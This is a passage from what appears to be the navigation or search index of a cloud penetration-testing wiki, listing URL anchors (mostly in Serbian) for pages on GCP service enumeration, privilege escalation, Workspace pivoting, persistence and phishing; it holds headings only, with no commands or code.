ity/gcp-services/gcp-containers-gke-and-composer-enum.html#tls-boostrap-privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#tajne-u-kubelet-api","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#gcp----dataproc-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#komponente","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeracija-klastera","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeracija-poslova","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---dns-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---cloud-dns","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#gcp---filestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#povezivanje","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#rezervne-kopije","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#enkripcija","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#gcp---firebase-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#firebase","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#neautentifikovana-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#autentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#informacije-o-pristupu-sa-appid-i-api-ključem","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#reference","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#gcp---firestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#cloud-firestore","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#gcp---iam-principals--org-policies-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#service-accounts","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#korisnici-i-grupe","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#iam","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#podrazumevane-dozvole","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#set-iam-policy-vs-add-iam-policy-binding","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cloudasset-iam-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#testiampermissions-enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#neautentifikovana-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#post-eksploatacija","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#persistencija","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#org-politike","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc-1","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#gcp---kms-enum","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#kms","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#nivo-zaštite-ključeva","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#svrhe-ključeva","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#period-rotacije-i-period-programiran-za-uništenje","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#primarna-verzija","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#eskalacija-privilegija","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#post-eksploatacija","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#reference","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#gcp---logging-enum","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#tok-logova","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#konfiguracije-podržane-od-strane-gcp-logging-a","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#gcp---memorystore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#gcp---monitoring-enum","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#politike","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#kontrolne-table","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#kanali","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#snoozers","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#post-eksploatacija","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#reference","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#gcp---pubsub-enum","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#snapshots--schemas","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#eskalacija-privilegija-i-post-eksploatacija","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub-lite","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#gcp---secrets-manager-enum","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#secret-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#eskalacija-privilegija","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#post-eksploatacija","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#perzistencija","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#zloupotreba-rotacije","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#gcp---security-enum","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#security-command-center","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#pretnje","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#detections-and-controls","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#data-protection","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#zero-trust","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#gcp---source-repositories-enum","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#offsec-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#open-in-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#gcp---spanner-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#cloud-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#gcp---stackdriver-enum","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#stackdriver-logging","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#reference","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#gcp---storage-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage-types","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#access-control","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#versioning","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#retention-policy","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#public-access","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#hmac-keys","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#eskalacija-privilegija","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#neautentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#post-eksploatacija","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#perzistencija","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#gcp---workflows-enum","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enkripcija","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enumeracija","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#privesc-i-post-exploitation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#od-gcp-do-gws","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#osnovi-delegacije-na-nivou-domena","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#kompromitovanje-postojeće-delegacije","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#kreirajte-novu-delegaciju-persistencija","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#kreiranje-projekta-za-enumeraciju-workspace-a","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#zloupotreba-gcloud-akreditiva","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#od-gws-do-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#pristup-privilegovanim-gcp-korisnicima","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#eskalacija-privilegija-google-grupa","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#reference","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#gcp---razumevanje-delegacije-na-nivou-domen","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#razumevanje-delegacije-na-nivou-domen","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#delegacija-na-nivou-domen-iza-scene","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#gcp---neautentifikovana-enum--pristup","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#otkriće-javnih-resursa","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#brute-force-javnih-resursa","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#buckets-firebase-aplikacije--cloud-funkcije","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#gcp---api-ključevi-neautentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#api-ključevi","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#osint-tehnike","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#proverite-poreklo-gcp-projekta---apikeyskeyslookup","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#brute-force-api-endspoints","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#gcp---app-engine-neautentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#brute-force-poddomeni","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#gcp---enum-neautentifikovanih-artefakata","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#artefakt-registracija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#zbunjenost-zavisnosti","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#gcp---cloud-build-neautentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloudbuildyml","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#pr-odobrenja","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#gcp---cloud-functions-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#brute-force-urls","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#enumerate-open-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#gcp---cloud-run-neautentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#enumeracija-otvorenog-cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#gcp---cloud-sql-neautentifikovana-enumeracija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#gcp---compute-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ssrf---server-side-request-forgery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ranjive-izložene-usluge","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#gcp---iam-principals--org-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#iam--gcp-principals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#da-li-se-domen-koristi-u-workspace-u","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#enumeracija-e-pošte-i-servisnih-naloga","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#gcp---izvori-repozitorijumi-neautentifikovana-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#izvori-repozitorijumi","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#kompromitovanje-eksternog-repozitorijuma","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#gcp---storage-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#storage","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#public-bucket-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#search-open-buckets-in-current-account","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#gcp---eskalacija-privilegija-javnih-kanti","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#eskalacija-privilegija-kanti","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#provera-dozvola","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#eskalacija","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#references","pentesting-cloud/workspace-security/index.html#gws---workspace-pentesting","pentesting-cloud/workspace-security/index.html#ulazne-tačke","pentesting-cloud/workspace-security/index.html#google-platforme-i-phishing-aplikacije-sa-oauth","pentesting-cloud/workspace-security/index.html#password-spraying","pentesting-cloud/workspace-security/index.html#post-eksploatacija","pentesting-cloud/workspace-security/index.html#gws-gcp-pivoting","pentesting-cloud/workspace-security/index.html#gws--gcpw--gcds--sinhronizacija-direktorijuma-ad--entraid","pentesting-cloud/workspace-security/index.html#postojanost","pentesting-cloud/workspace-security/index.html#oporavak-kompromitovanog-naloga","pentesting-cloud/workspace-security/index.html#reference","pentesting-cloud/workspace-security/gws-post-exploitation.html#gws---post-exploitation","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-groups-privesc","pentesting-cloud/workspace-security/gws-post-exploitation.html#access-groups-mail-info","pentesting-cloud/workspace-security/gws-post-exploitation.html#gcp--gws-pivoting","pentesting-cloud/workspace-security/gws-post-exploitation.html#takeout---preuzmi-sve-što-google-zna-o-nalogu","pentesting-cloud/workspace-security/gws-post-exploitation.html#vault---preuzmi-sve-podatke-workspace-a-korisnika","pentesting-cloud/workspace-security/gws-post-exploitation.html#contacts-download","pentesting-cloud/workspace-security/gws-post-exploitation.html#cloudsearch","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-chat","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-drive-mining","pentesting-cloud/workspace-security/gws-post-exploitation.html#keep-notes","pentesting-cloud/workspace-security/gws-post-exploitation.html#modify-app-scripts","pentesting-cloud/workspace-security/gws-post-exploitation.html#administrate-workspace","pentesting-cloud/workspace-security/gws-post-exploitation.html#references","pentesting-cloud/workspace-security/gws-persistence.html#gws---persistencija","pentesting-cloud/workspace-security/gws-persistence.html#persistencija-u-gmail-u","pentesting-cloud/workspace-security/gws-persistence.html#app-lozinke","pentesting-cloud/workspace-security/gws-persistence.html#promena-2-fa-i-slično","pentesting-cloud/workspace-security/gws-persistence.html#persistencija-putem-oauth-aplikacija","pentesting-cloud/workspace-security/gws-persistence.html#persistencija-putem-delegacije","pentesting-cloud/workspace-security/gws-persistence.html#persistencija-putem-android-aplikacije","pentesting-cloud/workspace-security/gws-persistence.html#persistencija-putem--app-skripti","pentesting-cloud/workspace-security/gws-persistence.html#reference","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gws---workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad--entraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcsd---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#gws---admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#osnovne-informacije","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#iz-adentraid---google-workspace--gcp","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#iz-google-workspace---adentraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#osnovne-informacije","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---disk-tokeni-i-ad-akreditive","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---ispisivanje-tokena-iz-memorije","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---generisanje-pristupnih-tokena-iz-osvežavajućih-tokena","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#osnovne-informacije","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---mitm","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---otisak-prsta","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---dobijanje-tokena","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---registry-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---tokeni-za-osvežavanje-diska","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---ispisivanje-tokena-iz-memorije-procesa","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---generisanje-pristupnih-tokena-iz-osvežavajućih-tokena","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---opsezi","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---oporavak-lozinke-u-čistom-tekstu","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#reference","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#osnovne-informacije","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---konfiguracija","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---ispisivanje-lozinke-i-tokena-sa-diska","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---ispisivanje-tokena-iz-memorije","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---generisanje-pristupnih-tokena-iz-osvežavajućih-tokena","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#gws---google-platforms-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#generic-phishing-methodology","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-groups-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-chat-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-doc-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-calendar-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-redirect-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-oauth-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#oauth-apps-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#unverified-app-prompt","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#interesting-scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#create-an-oauth-app","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#reference","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#gws---app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#kreirajte-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-scenario","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#kreirajte-google-sheet-sa-app-script-om","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#leak-token","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-trigger","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#sharing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#abusing-shared-with-me-documents","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#copying-instead-of-sharing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#sharing-as-web-application","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#testing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-kao-persistencija","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#zaobilaženje-nepoverljivog-upita-za-deljeni-dokument","pentesting-clou